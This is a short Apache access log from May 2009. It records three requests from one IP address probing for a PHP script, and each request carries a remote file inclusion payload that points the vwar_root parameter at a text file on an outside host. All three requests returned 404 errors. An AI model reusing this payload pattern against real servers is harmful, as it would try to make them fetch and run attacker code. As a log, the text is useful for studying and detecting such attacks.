85.17.162.28 - - [30/May/2009:00:29:30 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:29:32 -0400] "GET /convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
85.17.162.28 - - [30/May/2009:00:29:32 -0400] "GET /logs/access_log.Q108031900/convert/mvcw.php?vwar_root=http://chicken.3dn.ru/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
